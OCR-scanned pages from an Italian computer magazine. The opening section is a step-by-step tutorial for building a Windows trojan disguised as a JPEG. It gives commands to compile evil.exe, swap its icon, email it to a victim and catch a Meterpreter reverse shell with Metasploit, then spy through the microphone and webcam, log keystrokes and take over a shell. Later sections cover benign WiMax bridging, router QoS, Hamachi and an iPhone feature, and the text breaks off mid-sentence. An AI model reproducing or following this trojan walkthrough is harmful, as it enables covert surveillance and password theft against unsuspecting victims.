a Serve un’immagine 

Il Web pullula di immagini divertenti: più sarà curiosa l’im¬ 
magine utilizzata dal pirata, maggiori saranno le probabilità 
che il malcapitato deciderà di cuccarci sopra due volte per vederla 
ingrandita! Il pirata raggiunge dunque Google Immagini e sceglie 
la foto che ritiene più opportuna. 


Ha ModAta duétti Carta Tarm*ata Afcrte 


l:«*f i»v /foot««poi ta/w-jw* «h>ll/a9S_ p owi , «fr»\V.* l *i)ttlOI».t» 
: # KJ r vic» *c^cb«2 start 


a Salvataggio in corso 

Può procedere ora al salvataggio dell'immagine che ritiene 
più adatta al suo malevolo scopo. La seleziona quindi col 
tasto destro del mouse, clicca Salva immagine con nomee nella 
finestra che appare raggiunge il percorso /var/www/html/ Quindi 
nomina l'immagine come screenshotjpg. 


a. Web server avviato! 

^ A questo punto, tutto è pronto per avviare il Web server 
locale (presente di default e già configurato in Kali Linux) 
e rendere accessibile il suo contenuto anche via rete agli altri PC. 
Il pirata awia il terminale e da qui digita Service apache2 start 
seguito dal tasto Invio. 
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Hacker in pratica 


Q II virus prende forma 

Per il pirata è arrivato il momento di creare la Jpea da utilizzare come esca: pochi clic 
ed è subito pronta per essere spedita alla vittima designata. L’attacco è iniziato! 



Il codice malevolo 

Il pirata awia il terminale e lancia il comando gedit per avvia¬ 
re un semplice editor di testo non formattato. In un nuovo file 
incolla il codice presente alla pagina http://pastebin.com/BpYMb2rN 
avendo cura di sostituire l’indirizzo IP con quello della macchina attac¬ 
cante (Passo B4) 


^ Tutto in un file! 

Effettuate le modifiche, il pirata clicca sul pulsante Salva e 
memorizza il file (ad esempio sul Desktop) con il nome che 
preferisce seguito da .c (ad esempio, evil.c). Non gli resta che con¬ 
fermare premendo nuovamente il pulsante Salva. Può quindi chiu¬ 
dere l'editor di testo Gedit. 




D 


COSA FA IL CODICE 
DEL PIRATA? 


Nonostante si possa 
pensare il contrario, 
il codice utilizzato dal 
malintenzionato per 
invadere il nostro siste¬ 
ma è davvero banale. Il 
più, infatti, è costituito 
dal payload che, come 
abbiamo già avuto mo¬ 
do di analizzare, viene 
creato automaticamen¬ 
te dai tool integrati in 
Kali Linux. Ma allora, a 
cosa serve il codice ana¬ 
lizzato nel Passo DI? 

A far sì che il payload 
venga caricato sul PC 
della vittima. Al tempo 
stesso, per non destare 
sospetti, questo codice 
fa sì che l'immagine 
utilizzata come esca 
venga effettivamente 
visualizzata. Di fatto, 
però, l'immagine verrà 
richiamata sul Web ser¬ 
ver del PC attaccante: 
ecco perché per il pirata 
è importante (se non 
fondamentale) fornire 
il suo indirizzo IP locale 
o pubblico (utilizzando 
magari un DNS dina¬ 
mico). 


^ Creazione dell’eseguibile 

Il pirata si ritrova nuovamente nella finestra del terminale. Per 
lui è arrivato il momento di trasformare il file appena creato 
in un eseguibile Windows. Per farlo, raggiunge il percorso nel quale 
ha salvato il file .c con cd Scrivania e digita gcc evil.c -o evil.exe 
seguito da Invio. 



^ Da immagine a icona 

^ A questo punto, il pirata avvia il browser e raggiunge il sito 
Web www.icoconvert.com. Clicca sul pulsante Browse e rag¬ 
giunge il percorso nel quale ha salvato l’immagine screenshot.jpg 
(Passo C3), la seleziona e conferma dapprima con un clic sul pul¬ 
sante Apri e successivamente con Upload. 



^ Conversione effettuata! 

Il pirata scorre la pagina Web fino a raggiungere la sezione 
Select thè icon format Qui clicca su ICO for Windows 7 
Windows 8, Vista a/7c/ AP e seleziona la casella 256x256. Non gli 
resta che cliccare sul pulsante Converte attendere qualche secondo 
affinché la conversione venga effettuata. 


Tutto su pendrive 

Infine, il pirata clicca su Downloadyouricon, seleziona Save 
File e conferma con OK. A questo punto, può copiare su una 
pendrive USB il file .exe creato al Passo D3 e l’icona appena scari¬ 
cata e spostarsi su un PC equipaggiato con Windows per perfezio¬ 
nare la sua opera. 


► 
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li Da eseguibile ad immagine 

caramelle dagli Ecco come il pirata cambia l’icona del virus che ha creato facendolo somigliare in tutto e per tutto 
sconosciuti! all’anteprima di una fotografia digitale. Una vera e propria trappola pronta a scattare. 


Quella frase che tanto 
ci siamo sentiti dire in 
tenera età, anche in 
questo caso è vera più 
che mai. Diffidiamo 
dalle immagini ricevute 
tramite messaggio di 
posta elettronica da 
contatti a noi scono¬ 
sciuti: dietro potrebbe 
infatti nascondersi un 
virus pronto ad agire. 
Così com'è meglio stare 
alla larga da quelle im¬ 
magini un po'osé che si 




^ Editing del file EXE 


Aggiunta dell’icona 


trovano facilmente sul 
Web: chi ci garantisce 
che siano effettiva¬ 
mente immagini e non 
esche accuratamente 
posizionate da un pirata 
pronto a raccogliere le 
sue prede? 


Il pirata sposta in un PC Windows i file copiati al Passo D3 
e scarica dal Web il software Resource Hacker. Lo avvia, si 
sposta nel menu File, clicca su Open, raggiunge il percorso nel quale 
ha salvato il file .exe e ne conferma l’apertura. Clicca quindi su Add 
Binary or Image Resource. 



Nella nuova finestra che appare, il pirata clicca su SelectFile 
e seleziona l’icona in formato./co trasferita al passo prece¬ 
dente. Conferma dapprima con Add Resource e, dopo essere ritor¬ 
nato all’interfaccia grafica principale di Resource Hacker, con un clic 
sul pulsante Save. 
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^ Virus appena sfornato! 

Il nuovo file .exe (salvato automaticamente nella stessa direc¬ 
tory nella quale è presente quello originale e trasferito al Pas¬ 
so E1) ha ora un aspetto decisamente simile ad un'anteprima di una 
foto: così facendo, il malcapitato ci cuccherà due volte convinto di 
aprire una vera immagine. 



^ Invio del virus 

^ A questo punto, il pirata può inviare tramite e-mail il nuovo file 
.exe (ma che in realtà sembra un’immagine) alla sua vittima 
e ritornare al PC equipaggiato con Kali Linux. Da qui, avvia il termi¬ 
nale e lancia il comando msfconsole. Digita poi use multi/handler 
e conferma con Invio. 



^ Il centro di controllo 

Il pirata entra quindi nel vivo dell'azione digitando setPAY- 
LOAD windows/meterpreter/reversejcp e conferma con 
Invio. Con questo comando, infatti, dice al software Metasploit 
(msfconsole) di utilizzare il payload che ha creato in precedenza 

(Macropasso B) 


^ Non resta che attendere- 

Q II pirata lancia set LHOST seguito dall’IP della macchina attac¬ 
cante (ad esempio 10.0.2.15) e preme Invio. Successiva¬ 
mente, digita setLPORT4444, che è la porta in ascolto configurata 
al Passo B5, e conferma premendo ancora una volta il tasto Invio. 
Tutto è pronto per sferrare l’attacco. 
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Così entra nel tuo PC! 


Il pirata e riuscito a prendere il controllo del computer della vittima: cosi riesce a spiare 
la sua vita privata da Webcam e microfono e a scovare ogni tipologia di password. 



^ Il pesce ha abboccato! 

All’interno di Metasploit (mfsconsole) il pirata lancia il 
comando exploit Ora non gli rimane che sperare che il 
malcapitato che ha ricevuto la finta immagine decida di cliccarci 
sopra due volte, cascando nel tranello. Non appena lo farà, la ses¬ 
sione Meterpreter verrà avviata automaticamente. 



a Così attiva il microfono... 

Se il computer bersaglio è dotato di microfono, il pirata 
può addirittura catturare suoni, voci e rumori presenti nel¬ 
la stanza in cui si trova l'ignara vittima. Per farlo, il pirata digita il 
comando record_mic -dX seguito da Invio , dove Xè il numero di 
secondi di registrazione. 



^ Tu digiti, lui registra! 

Il pirata ha la possibilità di configurare un keylogger: ogni 
tasto premuto dalla sua vittima verrà registrato in modo da 
visualizzare (in chiaro!) ogni password digitata. Il pirata lancia key- 
scan_starte , dopo un po' di tempo, keycan_dump per visualiz¬ 
zare tutti i caratteri digitati dal malcapitato. 



^ Cattura di uno screenshot 

Da questo momento in poi, la vita del malcapitato sarà dav¬ 
vero dura. Il pirata, infatti, può iniziare a sfruttare tutte le 
potenzialità di Metasploit. Ad esempio, per catturare uno screen¬ 
shot al pirata basta lanciare in Meterpreter il comando screenshot 
L'immagine verrà salvata al percorso indicato. 



a ... e la Webcam! 

^ Stesso discorso per la Webcam: il pirata può catturare 
un’istantanea di ciò che viene inquadrato o, addirittura, 
avviare un live streaming. Gli basta lanciare il comando webcam_ 
snap (per catturare un trame) o webcam_stream (per avviare lo 
streaming che visualizza direttamente nel browser). 



^ Controllo totale 

Come se non bastasse, il pirata può anche assumere il 
pieno controllo del PC della vittima. Lanciando il comando 
Shell, infatti, il pirata si ritrova di fronte ad un prompt dei comandi 
del PC bersaglio. Da qui può esplorare file, cancellarli o aggiun¬ 
gerne di nuovi (ad esempio altri virus!). 



CHI TI SPIA 
DALLA WEBCAM? 

La quasi totalità dei no¬ 
tebook attualmente in 
commercio è dotata di 
una Webcam integrata 
posizionata general¬ 
mente nella parte 
superiore della cornice 
del display. Molti mo¬ 
delli di notebook, però, 
offrono anche un LEDdi 
funzionamento che si 
accende nel caso in cui 
la periferica sia in uso. 
Se quando stiamo di 
fronte al PC vediamo ac¬ 
cendersi dal nulla il LED 
della Webcam, questo è 
un chiaro campanello di 
allarme: qualcuno ci sta 
spiando! 
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Fatti l’ADSL 
con il Wi-Fi 


Cosa ci 
occorre 
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Esiste un modo per condividere file tra due PC, che 
possono trovarsi anche a chilometri di distanza, senza 
avere un collegamento a Internet attivo. Ecco come fare 



A prire il browser e iniziare a navigare sul Web o scambiare 
file con altri PC: sono operazioni quotidiane che eseguiamo 
automaticamente ogni giorno quando avviamo il computer. 
Eppure, se non avessimo un router collegato a Internet e un abbona¬ 
mento ADSL, diverrebbero di fatto impossibili da compiere. Tutta¬ 
via, per creare una rete di computer, Internet non è Tunica soluzione. 

Ti vedo e ti condivido 

La tecnologia, negli ultimi anni, si è evoluta parecchio e ormai 
possiamo mettere in comunicazione due PC rinunciando al classico 
modem/router e sfruttando semplicemente la tecnologia wireless. 
Basta infatti montare e configurare due speciali antenne, fare in modo 
che si "vedano" mettendole in comunicazione tra loro e il gioco è 
fatto: potremo condividere file e cartelle tra il computer che abbiamo 
a casa e quello che abbiamo in ufficio o in un'altra abitazione senza 


fili e senza usare il modem. Come se non bastasse, potremo portare 
Internet anche dove non arriva la linea telefonica. E il bello è che 
le due antenne, e quindi i due computer, possono trovarsi anche a 
chilometri di distanza tra loro! Nessun trucco: basta semplicemente 
sfruttare le reti WiMax a 5 GHz che, proprio grazie alla loro potenza, 
permettono di portare il segnale a chilometri di distanza con velocità 
di trasferimento dati che nulla hanno da invidiare alle ADSL più 
veloci. Nell’articolo impareremo ad utilizzare due antenne WiMax 
configurandole una come un Access Point, in grado di trasmettere 
il segnale wireless (e condividere eventualmente TADSL), e l’altra 
come Station in grado di ricevere questo segnale. L'unica accortezza 
a cui prestare attenzione è che tra le due non ci siano ostacoli natu¬ 
rali o architettonici. Ma con la nostra guida riusciremo a superare 
anche questi! Buon divertimento, dunque, e che la condivisione 
senza fili abbia inizio. 


□ Le due antenne si vedono 

Prima di allestire la rete wireless privata, dobbiamo verificare che tra i due punti non ci siano montagne o 
collinette che ostacolino il segnale. Per farlo, possiamo usare una particolare applicazione delle mappe di Google. 



^ La linea di collegamento 

Colleghiamoci all’indirizzo www.winmagazi- 
ne.it/link/3387. Nel campo Partenza, in alto, 
indichiamo l'indirizzo preciso del punto in cui posi¬ 
zioneremo l’antenna che trasmetterà il segnale (l'Ac¬ 
cess Point), in Destinazione l'indirizzo della ricevente 
(la Station) e premiamo Invio. 


^ La distanza è giusta 

Nel campo Distanza in KM accertiamoci di 
rientrare nei limiti di operatività delle antenne 
WiMax, che nel caso dei modelli usati nell’articolo è 
di 10 Km. Non ci resta che verificare il corretto posi¬ 
zionamento delle nostre due antenne utilizzando le 
mappe satellitari di Google. 


^ Non ci sono ostacoli 

Nel grafico dell 'Altitudine verifichiamo che 
tra i due punti non ci siano montagne 0 
collinette che impediscano alle antenne di “veder¬ 
si”: tracciando una linea immaginaria non dobbia¬ 
mo incontrare alcun ostacolo. Se è così, possiamo 
iniziare la configurazione della nostra rete wireless. 
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USIAMO UNA FOTOCAMERA PER "VEDERE" L'ACCESS POINT 

L'applicazione usata nel Macropasso precedente è molto utile per verificare 
che tra i due punti di trasmissione e ricezione della rete wireless privata non 
ci siano ostacoli naturali che ne impediscano il collegamento. È comunque 
opportuno scattare anche una foto per avere la certezza che l'antenna rice¬ 
vente "veda" chiaramente l'Access Point, cioè che il collegamento tra le due 
Ubiquiti sia libero da qualsiasi ostacolo, come ad esempio palazzi, ponti o 
campanili (nelle nostre prove abbiamo usato una Canon Powershot G3 X, 
ma va bene anche una semplice digicam con uno zoom abbastanza spinto. 

Sconsigliamo l'uso di smartphone perché, per quanto sofisticati, non hanno 
fotocamere dotate di zoom ottico). La foto tornerà utile anche per posizionare 
correttamente le due antenne: non è necessaria una precisione millimetrica, 
ma quanto più accuratamente riusciamo a puntarle una verso l'altra, tanto 
migliore sarà il segnale e, di conseguenza, la velocità di scambio dati. 



□ Configuriamo l’Access Point 

Colleghiamo una delle due Ubiquiti Nanostation al computer connesso alla linea ADSL di casa e configuriamola 
mediante il suo pannello di controllo. L’antenna funzionerà da trasmittente per la nostra rete wireless privata. 




^ Ecco l'interfaccia Web 

j Per comodità, effettuiamo la configurazione 

delle due antenne rimanendo a casa. Solo al 
termine prowediamo a posizionarle nei luoghi prescel¬ 
ti. Colleghiamo una delle due antenne al PC (impostan¬ 
do un IP statico su 192.168.1.1) tramite cavo Ethernet 
e col browser colleghiamoci a 192.168.1.20. 



^ Creiamo la rete LAN 

^ Dal tab Network selezioniamo Bridge (menu 
Network Mode). Impostiamo su Simple la 
voce Configuration Mode. Attiviamo l'opzione Sta¬ 
ffe e impostiamo l’indirizzo IP dell’Access Point: 
192.168.1.180 come IP Address, 255.255.255.0 
come Netmaske 192.168.1.1 come Gateway IP 


-x Usiamo le frequenze italiane 

Effettuiamo il login inserendo i dati di 
accesso predefiniti: ubnt sia come nome 
utente sia come password. È anche necessario 
specificare che risiediamo in Italia come Country. 
Spuntiamo la casella lagree to these terms ofuse 
e cucchiamo Login. 
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-x Ecco il punto di accesso 

Spostiamoci nel tab Wireless e selezionia¬ 
mo Access Point in Wireless Mode. In SSID 
nominiamo l'antenna (ad esempio: ubnt_skynet). 
Quindi, in Channel Width impostiamo il valore 20 MHz , 
mentre in Frequancy, MHz scegliamo l'opzione auto. 
Lasciamo invariati tutti gli altri parametri. 


^ Configuriamo l’antenna 

Nella schermata che appare spostiamoci 
nella scheda airMax Settings, quella con 
il logo della Ubiquiti, e mettiamo la spunta nella 
casella Enable in corrispondenza della voce airMax, 
lasciando invariati gli altri parametri presenti in que¬ 
sta schermata. 



^ Attenti alla sicurezza 

g Rimanendo nel tab Wireless, spostiamoci in 
Wireless Securitye selezioniamo l'opzione 
WPA2-AES dal menu a tendina Security. Nel cam¬ 
po WPA Preshared Key digitiamo una password per 
l'accesso all’antenna che funzionerà da Access Point. 
Clicchiamo Change e OK per applicare le modifiche. ► 
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Computer 1 chiama Computer 2! 


Possiamo ora configurare la seconda Nanostation, che installeremo sul balcone o sul tetto di una nostra seconda 
abitazione, per catturare il segnale wireless dell’Access Point e condividere così i contenuti dei due computer. 



± Attiviamo la ricevente 

■j Effettuiamo la stessa procedura che abbiamo 
visto nei passi B1, B2 e B3 per accedere al 
pannello di controllo della seconda antenna. Questa 
volta, però, impostiamo l’opzione airMax Prioritysu 
High nella scheda airMax Settings. Nel tab Wireless 
selezioniamo Station in Wireless Mode. 


± Attiviamo l’Access Point 

2 Alla voce SSID clicchiamo Select per avvia¬ 
re la scansione delle reti wireless disponibili. 
Nella schermata che appare selezioniamo la nostra 
ubnt_skynete clicchiamo Select Impostiamo Chan- 
nel Width su Auto 20/40 MHz e configuriamo le 
opzioni Wireless Security come al Passo B6. 


^ Connessione in corso 

In Network impostiamo IP Address su 
192.168.1.181 e configuriamo le altre voci 
con gli stessi valori usati per l’Access Point. Clicchiamo 
Change. In Main su entrambe le antenne verifichia¬ 
mo che gli indicatori Signal Strenghted airMax sia¬ 
no stabili sul verde a indicare il corretto collegamento. 



A QUALE RETE 
APPARTENIAMO? 

Per configurare corret¬ 
tamente le due antenne 
WiMax occorre imposta¬ 
re per entrambe un in¬ 
dirizzo IP appartenente 
alla stessa rete locale. 
Per conoscere il range di 
indirizzi assegnabili dal 
nostro router possiamo 
usare un software 
gratuito come SofPer- 
fect Network Scanner 
(www.softperfect.com). 
È sufficiente avviare la 
scansione per conoscere 
gli indirizzi IP utili ai 
nostri scopi. 


INIZIAMO A CONDIVIDERE FILE ANCHE SENZA INTERNET! 


La configurazione delle due antenne è 
finalmente completata: adesso possia¬ 
mo posizionarle sul balcone o sul tetto 
delle nostre abitazioni. Ovviamente, 
quella che funzionerà da Access Point 
andrà collegata ad una porta Ethernet 
del modem/router, in modo da poter 
condividere anche l'accesso alla rete 
Internet. L'antenna configurata come 
Station, invece, deve essere collega¬ 
ta ad una porta Ethernet del nostro 
secondo computer. Su quest'ultimo, 
a questo punto, non dobbiamo fare 
altro che avviare il browser, il Client di 
posta, la chat o un qualsiasi downlo¬ 
ad manager e utilizzarli normalmente 
proprio come se fossimo direttamente 
collegati al router ADSL. Per condivi¬ 
dere file tra i due computer, invece, 
non dovremo fare altro che creare una 
cartella condivisa su entrambi e acce¬ 
dervi normalmente da Risorse di rete 
proprio come faremmo se i due PC 
fossero collegati via cavo alla stessa 
rete LAN. Su Windows 10 è sufficiente 
creare una nuova cartella, selezionarla 
col tasto destro del mouse e scegliere 
Utenti specifici nel menu contestuale 


che appare. Nella nuova schermata è 
sufficiente selezionare Everyone dal 
menu a tendina, cliccare Aggiungi e 
poi Condividi. Sui prossimi numeri 


di Win Magazine analizzeremo altre 
configurazioni avanzate delle antenne 
Wi-Fi per potenziare ancora di più la 
nostra rete wireless privata! 
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CREIAMO UNA RETE WI-FI AD HOC TRA DUE PC CON WINDOWS 10 


Forse non lo sappiamo, ma in Win- Start/Tutte le app/Sistema Windows, 
dows lOèpossibilecreareunacon- clicchiamo col tasto destro su Prompt 
nessione senza fili per collegare di- dei comandi e selezioniamo Esegui 
rettamente due PC attraverso il Wi- come amministratore dal menucon- 
Fi, senza dover utilizzare un router testuale. Non tutte le schede Wi-Fi 
wireless. Per creare una cosiddetta sono compatibili con le reti ad hoc. 
"rete ad hoc" dobbiamo avviare il 4 V*<i I 

Prompt dei comandi. Andiamo in 


Per verificare se quella del PC lo 
è, digitiamo il comando netsh 
wlan show drivers e diamo 
Invio. Se alla riga Rete ospi¬ 
tata supportata com pa re 
la voce Sì allora è tutto 
OK, altrimenti dovre¬ 
mo aggiornare i dri¬ 
ver della scheda. Di¬ 
gitiamo il comando 
netsh wlan set hosted- 
network mode=allow 
ssid = NomeRete 
key=ChiaveRete. No- 
meRete è il nome 
che vo¬ 


gliamo assegnare alla rete, mentre Wi-Fi nella taskbar di Windows 10 
ChiaveRete è la chiave di accesso e selezionando Apri Centro con- 
alla rete (deve essere di almeno nessioni di rete e condivisione. In 
8 caratteri). Dopo aver premuto Visualizza reti attive troveremo 
Invio, la rete ad hoc viene creata, tra le altre reti anche quella ad 
Per attivarla, sempre dal Prompt hoc appena creata. Per disatti- 
dei comandi digitiamo netsh wlan vare la rete ad hoc basta digita- 
starthostednetwork e premiamo re il comando netsh wlan stop 
Invio. Subito dopo comparirà la hostednetwork o, in alternativa, 
scritta Rete ospitata avviata che ci riavviare il computer. Nel caso in 
conferma che la nostra rete ad hoc cui, invece, volessimo disinstallare 
è stata abilitata correttamente, completamente la rete ad hoc, 
Possiamo verificare la presenza dobbiamo utilizzare il comando 
della nuova rete cliccando col de- netsh wlan set hostednetwork 
stro sull'icona della connessione mode=disallow. 


La parola all'avvocato 



CONDIVIDERE L'ADSL 
DI CASA: ECCO COSA 
DICE LA LEGGE 

Non sempre ciò che è tecnicamente semplice 
è giuridicamente lecito. È una massima che gli 
appassionati di tecnologia - specie nel nostro 
Paese - non dovrebbero dimenticare mai per¬ 


ché utile a evitare che si caccino nei pasticci. 
Ed è una massima che vale anche per l'idea 
tanto semplice - tecnologicamente parlando 
- quanto giuridicamente rischiosa di utilizzare 
un "ponte Wi-Fi"per condividere la connessio¬ 
ne Internet tra casa e ufficio, tra due case o tra 
due propri uffici. La realizzazione del ponte- 
radio via Wi-Fi non crea, di norma, particolari 
problemi, a condizione che le comunicazioni 
che vi transitano siano per uso privato ovvero 
riservate alla sfera del gestore della rete e che 
i dispositivi impiegati siano conformi a quelle 
che il codice delle comunicazioni elettroniche 
rubrica di "libero uso". Sensibilmente diversa 
è invece la questione in relazione all'utilizzo 
di tale ponte per condividere risorse di con¬ 
nettività fornite da questo o quell'operatore. 


Normalmente, infatti, le condizioni generali 
di contratto che legano i clienti ai fornitori 
di risorse di connettività limitano contrat¬ 
tualmente la possibilità tecnica del cliente di 
utilizzare uno stesso abbonamento per servire 
più immobili anche se nella disponibilità dello 
stesso soggetto. Salvo, dunque, che il contrat¬ 
to con il proprio provider di connettività sia 
privo di una clausola contenente un divieto 
di questo genere, la condivisione della banda 
"via ponte Wi-Fi" da un appartamento ad un 
altro è un'idea che potrebbe costare al titolare 
dell'abbonamento una penale salata o la di¬ 
sdetta immediata dell'abbonamento stesso. 
Prima di avventurarsi su questa strada, quindi, 
vai la pena leggere bene il contratto con la 
compagnia di telecomunicazioni di turno. 
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Fai da te | Un'antenna per tanti PC 


ADSL sharing 
con il WiMax 

www.onefactory.it 


Ecco come creare una rete locale utilizzando due 
antenne wireless per condividere tra tutti i nostri 
computer la connessione a Internet 


N elle pagine precedenti abbiamo 
visto come creare una rete wi¬ 
reless a chilometri di distanza 
utilizzando due antenne a tecnologia 
WiMax, per scambiare file tra i nostri 
computer posizionati ad esempio in 
due diversi appartamenti. Lo scopo 
era quello di "portare” l’ADSL anche 
dove non c'era una presa telefonica 
per condividere la connessione ad 
Internet. Nell’esempio realizzato ab¬ 
biamo quindi collegato la seconda 
antenna direttamente ad un PC dal 
quale poi siamo riusciti a navigare in 
Rete proprio come se fosse collegato 
al router. 


Un’antenna, tanti 
dispositivi 

In questo articolo, invece, vogliamo 
fare un passo in avanti: vedremo 
quindi come collegare all’antenna 
"ricevente” un Access Point wireless 
per poter accedere alla rete wireless 
con più computer: non dovremo in¬ 
tervenire sulla configurazione delle 
antenne: sarà sufficiente staccare 
il cavo Ethernet dal PC e collegarlo 
all'Access Point opportunamente 
configurato. Vedremo quindi come 
realizzare una sottorete, differente 
da quella dell'antenna, in modo che 
idealmente i due ambiti collegati 


mediante la rete WiMax utilizzino 
reti diverse. A tal proposito, con¬ 
dividere file e cartelle tra PC ap¬ 
partenenti a reti differenti non è 
possibile in modo diretto, quindi 
utilizzeremo un software specifi¬ 
co per consentire ai computer di 
comunicare. In ultimo, vedremo 
come suddividere la connessione 
ad Internet in modo che ognuna 
delle sottoreti abbia una sua "por¬ 
zione": ipotizzando di avere Casal 
collegata con una 10 Mbps e Casa2 
tramite WiMax, assegneremo alla 
seconda un limite di banda di 5 
Mbps. Vediamo come si fa. 


—r 


LEGGI 

ANCHE... 


A pagina 34, abbiamo descrit¬ 
to la guida passo passo per 
configurare una rete wireless 
tra due PC e condividere file 
anche a chilometri di distan¬ 
za, senza avere un collega¬ 
mento a Internet attivo. 


□ Installiamo il router Wi-Fi 

Effettuato il collegamento delle due antenne WiMax, vedremo ora come si configura un Access Point per 
condividere la rete wireless e l’accesso a Internet tra tutti i dispositivi presenti nella nostra seconda abitazione. 



▲ Colleglliamoci al router 

Accendiamo il router Wi-Fi (abbiamo usato un 
TP-LinkWireless N Nano RouterTL-WR702N) 
e dal PC individuiamo la nuova rete senza fili, colle¬ 
gandoci ad essa. Solitamente non è necessario inse¬ 
rire password per accedere la prima volta: per questi 
dettagli facciamo riferimento al manuale d’uso. 


Modalità di funzionamento 

Dall'interfaccia di configurazione del router, 
nella scheda Working Mode dobbiamo impo¬ 
stare quale tipo di rete creare: usando la voce /^utiliz¬ 
zeremo la rete originale mentre con Router creeremo 
una nuova sottorete, diversa da quella d’origine. Sele¬ 
zioniamo Router e clicchiamo Save. 


^ Parametri di rete 

Spostiamoci adesso nella sezione Network/ 
WANe impostiamo i parametri di rete del 
router. In WAN Connection Type selezioniamo Sfa¬ 
te IP , quindi nei campi sottostanti inseriamo Indi¬ 
rizzo IP , Maschera di sottorete e Gateway relativi 
alla rete d’origine, poi clicchiamo Save. 
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13 Evitiamo di saturare la banda 

Dopo aver condiviso l’accesso a Internet su tutti i nostri dispositivi, non ci resta che impostare il QoS 
in modo da suddividere opportunamente la banda a disposizione tra le due reti. Ecco come fare. 



^ Una rete a metà 

Molti router Wi-Fi offrono la possibilità di 
impostare delle limitazioni di banda e il 
nostro è tra questi: andiamo in Advanced Set- 
tings/IP QoS e spuntiamo la voce Enable IP QoS. 
In Bandwith Apply inseriamo il limite che deside¬ 
riamo in Kilobit/sec, ad esempio 5000, per divi¬ 
dere in due una 10 Mbps. Clicchiamo Save. 



^ Configuriamo le antenne 

Se il router non prevede la possibilità di 
controllare il traffico possiamo impostare 
i limiti direttamente sulle antenne. Colleghiamo¬ 
ci all'indirizzo IP dell’antenna configurata come 
Station , effettuiamo l'accesso, andiamo nel tab 
Network e alla voce Configuration mode impo¬ 
stiamo Advanced. 



a Impostiamo le quote 

In basso appare la voce Traffic Shaping: 
clicchiamo Enable. Clicchiamo Edit in 
corrispondenza di LANO. Disabilitiamo Ingress, 
in Egress impostiamo 10240 nel campo Rate, 
5120 in Burste clicchiamo Save. Stessa cosa 
in corrispondenza di WLANO, limitandoci a met¬ 
tere 5120 in Rate. 


TP-LINK 



^ Una nuova rete 

^ Andiamo nella scheda LAN e inseria¬ 
mo l’indirizzo iniziale della nuova rete 
che andremo a creare. Possiamo inserirne una 
leggermente diversa dall'originale, ad esem¬ 
pio 192.168.50.1 (ammettendo che l’originale 
parta da 192.168.1.1) oppure completamente 
diversa, tipo 10.0.0.1. 


TP-UMK 



Il server DHCP 

Clicchiamo su Save e andiamo nella 
scheda Advanced Settings/DHCP Set- 
tings. Qui spuntiamo la voce Enable e inseria¬ 
mo, se vogliamo, gli indirizzi IP iniziali e finali 
che il server deve assegnare automaticamen¬ 
te, rispettivamente in Start IP Address e End 
IPAddress. Clicchiamo Save. 



^ Non dimentichiamo 
la sicurezza 

Colleghiamo il cavo Ethernet proveniente 
dall'antenna Ubiquiti Nanostation al router Wi-Fi per 
riuscire a navigare senza problemi da tutti i dispo¬ 
sitivi connessi. Se non abbiamo ancora provveduto 
a inserire una password per la nuova rete wireless, 
facciamolo in Wireless/Wireless Security. 
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Cartelle condivise in rete 


Se abbiamo creato una sottorete diversa dalla prima, abbiamo bisogno di un software come Hamachi per 
visualizzare e accedere alle cartelle condivise dai nostri PC. Ecco come installarlo e usarlo al meglio. 


QHamachi 

Croate virtu^l pr ivate network* orv^cmarxJ 






Registrati 


A 

A 


^ Installiamo il software 

Andiamo sul sito www.vpn.net e clicchiamo su Download Now per scari¬ 
care il software Hamachi. Al termine del trasferimento eseguiamo l’installer 
e seguiamo la procedura guidata fino al termine dell’installazione. Dobbiamo instal¬ 
larlo su tutti i PC che vogliamo condividere. 


^ Una rapida registrazione 

Al termine dell’installazione avviamo il software, clicchiamo su Sign Up e 
completiamo la scheda di registrazione con indirizzo e-mail e password. 
Clicchiamo su Crea accounte poi colleghiamoci all'indirizzo di conferma inviatoci 
via e-mail. Quindi clicchiamo su Crea nuova rete. 



^ Creiamo la nostra rete 

Inseriamo un nome (ID) e una password per la nostra rete. Sugli altri com¬ 
puter, dopo aver installato Hamachi, effettuiamo il login con e-mail e pas¬ 
sword precedentemente scelti, quindi clicchiamo su Partecipa a rete esistente e 
inseriamo ID e password della rete che abbiamo creato. 


-x Ecco le condivisioni 

^ Adesso Hamachi ci mostra la nostra rete con tutti i computer ad essa col¬ 
legati. Basterà cliccare su uno di essi con il tasto destro e scegliere Sfoglia 
per vederne le cartelle condivise. Se la condivisione delle cartelle prevede l'autenti¬ 
cazione ci verrà chiesto di inserire nome utente e password. 


QUANDO CONVIENE CREARE UNA SOTTORETE 


Nel Passo 2 del Macropasso A abbiamo visto 
come creare una sottorete differente da quella 
d'origine per differenziare i gruppi di compu¬ 
ter collegati dalle antenne WiMax: ciò è sicura¬ 
mente una soluzione valida dal punto di vista 
organizzativo e della sicurezza ma, come ab¬ 
biamo visto nel Macropasso C, ha anche delle 
controindicazioni: ad esempio, la difficoltà nel¬ 
la condivisione dei file. Se lo scopo principale 
del collegamento via WiMax è la condivisione 
di file e cartelle, allora è preferibile impostare 
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il router come semplice Access Point (la prima 
opzione del router accessibile dalla sua inter¬ 
faccia di configurazione e individuata dalla si¬ 
gla AP), mantenendo così tutti i PC nella stessa 
rete senza alcun problema di condivisione. Se 
viceversa il collegamento WiMax serve prin¬ 
cipalmente per condividere la connessione a 
Internet, il software Hamachi è un'ottima solu¬ 
zione gratuita (può infatti essere installato su 5 
computer) che permette la comunicazione tra 
computer di sottoreti diverse. 





































Il mio iPhone diventa dual SIM I Fai da te 


Hacker in pratica C* 


Se abbiamo più dispositivi iOS. in caso di telefonata 

possiamo scegliere da quale rispondere. Svelato il trucco! 


Il mio iPhone 
diventa dual SIM 



SMARTPHONE IOS 

APPLE 
IPHONE 5S 

Quanto costa: € 529,oo 
Sito Internet: 

www.apple.com/it 



C on iOS 8 Apple ha introdotto 
una funzione chiamata Con- 
tinuity, che consente di ope¬ 
rare con continuità su più dispositivi 
registrati con lo stesso Apple ID: ciò 
significa, per esempio, che se abbia¬ 
mo due iPhone (generazione 5 e suc¬ 
cessivi) e riceviamo una telefonata su 


uno dei due, possiamo rispondere da 
qualunque dei due telefoni. Lo stes¬ 
so vale anche per gli iPad (genera¬ 
zione 4 e successivi), iPod Touch (ge¬ 
nerazione 5 e successivi) e compu¬ 
ter Mac. L'unica condizione, a parte 
l'Apple ID, è che i dispositivi si tro¬ 
vino collegati alla medesima rete 


Wi-Fi. Può essere quindi comodo ri¬ 
spondere ad una telefonata, ma an¬ 
che ad un SMS tramite il dispositivo 
che si ha in mano anziché da quel¬ 
lo che ha effettivamente ricevuto la 
chiamata, che magari abbiamo di¬ 
menticato al piano di sotto. Come 
